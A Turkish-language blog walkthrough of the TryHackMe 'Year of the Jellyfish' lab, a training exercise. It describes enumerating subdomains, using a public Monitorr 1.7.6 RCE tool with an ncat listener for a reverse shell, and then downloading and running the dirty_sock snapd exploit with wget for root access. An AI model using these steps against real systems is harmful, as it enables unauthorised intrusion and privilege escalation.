Bu yazımda Tryhackme Year of the Jellyfish Çözümü sizler için detaylı olarak paylaşacağım.
- Makine İsmi: Year of the Jellyfish
- Zorluk: İleri Seviye
- Oda Linki: https://tryhackme.com/room/yearofthejellyfish
1- İlk olarak portları tespit ederek başlıyorum. Tarama yaptığımda 21,22,443,8000 portunun açık olduğunu tespit ettim. İncelemeye devam ediyorum.
2- 443. port altına baktığımızda SSL sertifika içerisinde farklı alt subdomainleri gördük bunlara ulaşmak için host adresimizin içerisine ekleyip devam edelim.
Portları detaylı inceledim ama önemli bir şeye ulaşamadım.
İlginizi çekebilecek yazımız: Apple, iOS 17.1 Güncellemesini Yayınladı
3- Terminale gelip sudo nano /etc/hosts içerisine girip subdomainleri ekleyip CTRL+x ardından Y enter yapıp çıkıyoruz.
- robyns-petshop.thm
- dev.robyns-petshop.thm
- beta.robyns-petshop.thm
- monitorr.robyns-petshop.thm
4- Tüm subdomainleri inceledim bir şey bulamadım ama monitorr alt alanına gittiğimde en alt kısımdan 1.7.6 versiyonu olduğunu öğrendim. Gidip searchsploit üzerinden versiyona uygun exploit araştırmaya başlıyorum.
5- İki tane exploit buldum, ikisini de indirip denedim ama exploit’ler çalışmıyor. İçerisinde düzenleme yapmama rağmen yine bir sonuç çıkmadı. İnternet üzerinden araştırma yapmaya devam ediyorum.
6- Evet karşıma bu çözdüğümüz makine için yazılmış python bir araç buldum. 🙂 Buradan direkt devam edebiliriz.
Bu araç direkt makine içerisinden shell almamıza olanak sağlıyor.
7- Masaüstüne geçiş yapıp aracı indirdim.
İlgili Link: https://github.com/jayngng/monitorr-v1.7.6m-rce
8- Araca yetki verdim ama çalıştırmaya başlıyorum.
9- Gösterdiği gibi yazıyorum. Local ip adresiniz tryhackme vpn ip adresinizdir. Local porta da 443 veriyoruz.
Öncesince ncat -lvnp 443 yazıp dinlemeye almayı unutmayın.
10- Direkt olarak makine içerisindeyiz. İlk bayrağımızı bulalım.
11- /var/www içerisine geçiş yaptım ve direkt bayrağı bulduk. Yetki yükseltmeye başlayalım.
12- Makine içerisine linpeas’ı yükleyerek araştırmaya çalışıyorum. Ama araç ile önemli bir şey bulamadım.
13- Kernel exploit ve versiyona göre internette detaylı araştırmaya yapmaya başlıyorum.
4.15.0 versiyon ve snap versiyon üzerinden de uygun exploit arıyorum.
14- Tmp klasörüne geçiş yapıp;
wget https://github.com/initstring/dirty_sock/archive/master.zip yazıp indirmeyi yapıyoruz.
Dirty sock yetki yükseltme de sistemi exploit ederek direkt hedef kullanıcısının kullanıcı adı ve şifresini bize verecek bizde direk root kullanıcısının içerişine geçiş yapmamıza olanak sağlayacak.
15- Direkt olarak bize kullanıcının parolasını verdi.
- unzip master.zip
- chmod+x dirty_sockv2.py
- ./dirty_sockv2.py
16- Kullanıcı adı ve parola;
- dirty_sock
- dirty_sock
dirty kullanıcısının içerisindeyiz. Tekrardan root içerisine geçiş yapmaya çalışıyorum ve evet direkt olarak root içerisindeyiz.
17- Bayrağı bulduk ve Tryhackme Year of the Jellyfish Çözümü sonuna geldik. Yeni yazılarda görüşmek üzere, sağlıcakla kalın..